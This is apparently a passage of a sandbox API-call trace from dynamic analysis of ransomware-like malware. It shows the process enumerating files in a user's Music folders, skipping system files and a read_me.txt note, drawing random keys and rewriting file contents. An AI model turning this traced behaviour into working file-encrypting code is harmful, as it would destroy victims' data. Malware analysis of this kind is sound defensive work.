(lpFirst="bquehe5.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.180] StrStrW (lpFirst="bquehe5.m4a", lpSrch="desktop.ini") returned 0x0 [0076.180] StrStrW (lpFirst="bquehe5.m4a", lpSrch="autorun.inf") returned 0x0 [0076.180] StrStrW (lpFirst="bquehe5.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.180] StrStrW (lpFirst="bquehe5.m4a", lpSrch="iconcache.db") returned 0x0 [0076.180] StrStrW (lpFirst="bquehe5.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.181] StrStrW (lpFirst="bquehe5.m4a", lpSrch="boot.ini") returned 0x0 [0076.181] StrStrW (lpFirst="bquehe5.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.181] StrStrW (lpFirst="bquehe5.m4a", lpSrch="thumbs.db") returned 0x0 [0076.181] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 123 [0076.181] QueueUserWorkItem (Function=0x404e00, Context=0x96c, Flags=0x0) returned 1 [0076.181] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.181] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\read_me.txt") returned 94 [0076.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\0bfits5we\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x970 [0076.181] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.181] CloseHandle (hObject=0x970) returned 1 [0076.181] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.181] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.181] wnsprintfW (in: pszDest=0x8d310a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\0bfITs5We\\read_me.txt") returned 94 [0076.181] GetProcessHeap () returned 0x4f10000 [0076.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d310a8 | out: hHeap=0x4f10000) returned 1 [0076.181] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 71 [0076.181] GetProcessHeap () returned 0x4f10000 [0076.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d510b8 | out: hHeap=0x4f10000) returned 1 [0076.181] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.181] ReadFile (in: hFile=0x768, lpBuffer=0x728fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x728fd4c*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.181] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.182] GetProcessHeap () returned 0x4f10000 [0076.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.182] GetProcessHeap () returned 0x4f10000 [0076.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0076.182] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0076.182] GetProcessHeap () returned 0x4f10000 [0076.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x7d85500 [0076.182] ReadFile (in: hFile=0x768, lpBuffer=0x7d85500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x7d85500*, lpNumberOfBytesRead=0x728fd08*=0x14, lpOverlapped=0x0) returned 1 [0076.183] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.183] WriteFile (in: hFile=0x768, lpBuffer=0x7d85500*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d85500*, lpNumberOfBytesWritten=0x728fd44*=0x14, lpOverlapped=0x0) returned 1 [0076.183] GetProcessHeap () returned 0x4f10000 [0076.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.183] GetProcessHeap () returned 0x4f10000 [0076.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.183] GetProcessHeap () returned 0x4f10000 [0076.183] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0076.183] GetProcessHeap () returned 0x4f10000 [0076.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.183] GetProcessHeap () returned 0x4f10000 [0076.183] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.183] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.184] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.185] GetProcessHeap () returned 0x4f10000 [0076.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778b0 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778b0 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.186] GetProcessHeap () returned 0x4f10000 [0076.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778b0 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778b0 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778b0 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d778b0 [0076.187] GetProcessHeap () returned 0x4f10000 [0076.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7d778b0 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d778b0 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.188] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.188] WriteFile (in: hFile=0x768, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x728fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.188] WriteFile (in: hFile=0x768, lpBuffer=0x728fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x728fd48*, lpNumberOfBytesWritten=0x728fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d85500 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.188] GetProcessHeap () returned 0x4f10000 [0076.188] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.188] CloseHandle (hObject=0x768) returned 1 [0076.189] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 5 [0076.189] GetProcessHeap () returned 0x4f10000 [0076.189] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d510b8 [0076.189] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\*") returned 90 [0076.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17f1d060, ftCreationTime.dwHighDateTime=0x1d4d033, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.189] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\.") returned 90 [0076.189] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17f1d060, ftCreationTime.dwHighDateTime=0x1d4d033, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.190] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\..") returned 91 [0076.190] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a37680, ftCreationTime.dwHighDateTime=0x1d4d4d5, ftLastAccessTime.dwLowDateTime=0xd6ce2e00, ftLastAccessTime.dwHighDateTime=0x1d4cf40, ftLastWriteTime.dwLowDateTime=0xd6ce2e00, ftLastWriteTime.dwHighDateTime=0x1d4cf40, nFileSizeHigh=0x0, nFileSizeLow=0x44dd, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="aLpSkpnAOV.wav", cAlternateFileName="ALPSKP~1.WAV")) returned 1 [0076.190] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\aLpSkpnAOV.wav") returned 103 [0076.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\aLpSkpnAOV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\alpskpnaov.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="read_me.txt") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="autoexec.bat") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="desktop.ini") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="autorun.inf") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="ntuser.dat") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="iconcache.db") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="bootsect.bak") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="boot.ini") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.190] StrStrW (lpFirst="alpskpnaov.wav", lpSrch="thumbs.db") returned 0x0 [0076.190] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 124 [0076.190] QueueUserWorkItem (Function=0x404e00, Context=0x8fc, Flags=0x0) returned 1 [0076.190] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e537bb0, ftCreationTime.dwHighDateTime=0x1d4c632, ftLastAccessTime.dwLowDateTime=0x18c68c00, ftLastAccessTime.dwHighDateTime=0x1d4d395, ftLastWriteTime.dwLowDateTime=0x18c68c00, ftLastWriteTime.dwHighDateTime=0x1d4d395, nFileSizeHigh=0x0, nFileSizeLow=0x10ce9, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="DAeR1.mp3", cAlternateFileName="")) returned 1 [0076.190] wnsprintfW (in: pszDest=0x8d510b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\DAeR1.mp3") returned 98 [0076.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\A0YKGsoY8M31ETQ\\DAeR1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\a0ykgsoy8m31etq\\daer1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x970 [0076.190] StrStrW (lpFirst="daer1.mp3", lpSrch="read_me.txt") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="desktop.ini") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="autorun.inf") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="iconcache.db") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="boot.ini") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.191] StrStrW (lpFirst="daer1.mp3", lpSrch="thumbs.db") returned 0x0 [0076.191] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 125 [0076.191] QueueUserWorkItem (Function=0x404e00, Context=0x970, Flags=0x0) returned 1 [0076.191] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1bcf780, ftCreationTime.dwHighDateTime=0x1d4c803, ftLastAccessTime.dwLowDateTime=0x6906d700, 